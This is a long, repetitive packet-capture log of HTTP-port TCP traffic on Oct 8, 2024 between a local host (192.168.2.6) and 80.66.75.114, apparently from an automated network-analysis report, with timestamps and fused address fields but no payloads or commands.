                                                Oct 8, 2024 04:24:39.210375071 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210381985 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210386038 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210396051 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210406065 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210417032 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210438967 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210469961 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210509062 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210519075 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210527897 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210539103 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210547924 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210549116 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210558891 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210560083 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210572004 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210581064 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210587025 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210592031 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210597038 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210602045 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210627079 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210648060 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210829020 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210870028 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210933924 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210944891 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210953951 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210963964 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210978985 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210980892 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210980892 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210990906 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210997105 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.211002111 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.211011887 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.211020947 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.211026907 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.211031914 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.211041927 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.211056948 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.211081028 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323183060 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323204041 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323213100 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323251009 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323261023 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323270082 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323276043 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323280096 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323306084 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323328972 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323332071 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323343039 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323352098 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323362112 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323369980 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323374033 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323400974 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323417902 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323427916 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323436975 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323457956 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323478937 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323486090 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323494911 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323507071 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323515892 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323523998 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323534012 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323564053 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323587894 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323599100 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323631048 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323652029 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323661089 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323671103 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323685884 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323710918 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323738098 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323749065 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323757887 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323766947 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323771954 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323787928 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323791027 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323801041 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323808908 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323817015 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323824883 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323832989 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323842049 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323843956 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323852062 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323863029 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323864937 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323885918 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323908091 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.323980093 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323990107 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.323999882 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324029922 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324042082 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324057102 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324067116 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324074984 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324084044 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324095011 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324096918 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324107885 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324110031 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324140072 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324167967 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324177980 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324187040 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324197054 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324218035 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324218035 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324239016 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324246883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324258089 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324266911 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324285030 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324287891 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324297905 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324300051 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324307919 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324316978 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324317932 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324337959 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324357986 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324385881 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324393988 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324433088 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324450016 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324471951 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324526072 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324536085 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324544907 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324554920 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324564934 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324594975 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324599981 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324605942 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324615002 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324620962 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324624062 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324635029 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324644089 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324665070 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324683905 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324794054 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324845076 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324872971 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324908018 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324911118 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324947119 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324974060 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324984074 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325007915 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325020075 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325093031 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325103998 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325110912 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325150967 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325150967 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325154066 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325165033 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325174093 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325197935 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325210094 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325351000 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325361013 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325372934 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325381041 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325388908 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325392008 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325407982 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325411081 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325411081 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325418949 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325427055 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325428963 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325439930 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325448990 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325450897 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325459003 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325469017 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325474024 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325479031 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325493097 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325500011 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325504065 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325505972 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325520039 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325530052 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325531960 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325541019 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325541973 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325551033 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325561047 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325565100 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325571060 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325606108 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325606108 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325622082 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325632095 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325639963 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325670958 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325670958 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325680971 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325690031 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325697899 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325706959 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325717926 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325741053 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325826883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325835943 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325845957 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325854063 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325859070 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325866938 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325877905 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325884104 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325901985 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325926065 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.413938046 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.413955927 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.413965940 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414030075 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414074898 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414261103 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414272070 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414280891 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414313078 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414333105 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414405107 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414414883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414423943 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414433956 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414453030 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414453030 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414477110 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414484978 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414485931 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414495945 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414505005 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414520025 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414530993 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414549112 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414550066 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414561033 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414570093 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414583921 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414592028 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414601088 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414611101 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414619923 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414628983 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414638042 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414654970 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414664030 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414673090 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414681911 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414690971 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414700031 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414709091 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414717913 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414726973 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414736032 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414746046 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414747000 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414747000 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414747000 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414747000 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414747000 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414756060 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414769888 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414777994 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414777994 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414777994 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414777994 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414777994 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414778948 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414788961 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414792061 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414803982 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414805889 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414813995 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414824009 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414829969 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414834023 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414846897 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414848089 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414855957 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414864063 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414866924 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414885998 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414911032 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414921999 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414932013 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414941072 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414951086 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414964914 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414978027 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415002108 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415030003 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415040016 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415049076 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415057898 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415067911 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415072918 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415077925 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415097952 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415108919 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415488958 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415498018 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415503979 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415513039 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415522099 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415530920 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415539980 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415540934 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415550947 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415560007 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415563107 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415570974 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415574074 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415581942 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415591955 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415592909 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415601969 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415610075 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415616035 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415635109 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415643930 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415649891 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415657997 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415668011 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415673971 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415677071 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415688038 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415695906 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.415697098 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415708065 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415716887 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.415718079 CEST4973880192.168.2.680.66.75.114
